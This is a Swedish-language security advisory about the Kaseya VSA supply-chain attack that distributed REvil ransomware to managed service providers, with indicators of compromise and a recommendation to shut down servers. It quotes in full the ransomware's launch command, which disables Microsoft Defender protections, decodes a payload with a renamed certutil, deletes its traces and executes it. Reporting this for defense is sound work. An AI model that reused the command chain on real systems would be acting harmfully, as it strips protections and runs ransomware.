Search

Ransomware-attack ger stor påverkan på företag

Omfattande attack mot MSP:er genom att använda Kaseya

För närvarande pågår en omfattande attack mot MSP:er genom att använda Kaseya VSA för att distribuera en version av REvil ransomware till kundernas miljöer. För närvarande är det flera MSP:er som har drabbats som en del av detta. Kaseya VSA är både en molnbaserad och lokal MSP-plattform som används för patchhantering och klientövervakning.

Kaseya har utfärdat en säkerhetsrådgivning som uppmanar kunder som kör den lokala lösningen att stänga av sina servrar som kör VSA tills vidare. Det är viktigt att detta görs så snart som möjligt eftersom en av de första sakerna ransomware gör är att inaktivera administrativ åtkomst till VSA.

 

Hur det fungerar

En automatisk uppdatering skickades till produkten som innehöll REvil ransomware.

The ransomware will start of by running the following command:
“cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

Detta kommer att allvarligt skada Microsoft Defender och inaktivera funktioner som annars sannolikt skulle ha förhindrat ransomware.

Därefter avkodas c:\kworking\agent.crt och agent.exe extraheras som innehåller filerna MsMpEng.exe och mpsvc.dll. Den första filen är en legitim version av Microsoft Defender och den andra är REvil encryptor-nyttolasten som kommer att använda sidoladdning och injicera sig själv i den legitima Windows Defender-exectuable och genom det kryptera systemet.

Indikatorer på kompromiss

D55F983C994CAA160EC63A59F6B4250FE67FB3E8C43A388AEC60A4A6978E9F1E
8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd
e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2
C:\kworking\agent.exe
C:\Windows\mpsvc.dll
More IoCs

Rekommendation

Orange Cyberdefense rekommenderar att servrar som kör Kaseya VSA omedelbart stängs ner och att man följer ytterligare officiella uppdateringar från Kaseya.

Referenser
REvil ransomware hits 200 companies in MSP supply-chain attack
REvil ransomware gang executes supply chain attack via malicious Kaseya update
Kaseya supply chain attack delivers mass ransomware event to US companies

Read More

Incident Response Hotline

Facing cyber incidents right now?

Contact our 24/7/365 world wide service incident response hotline.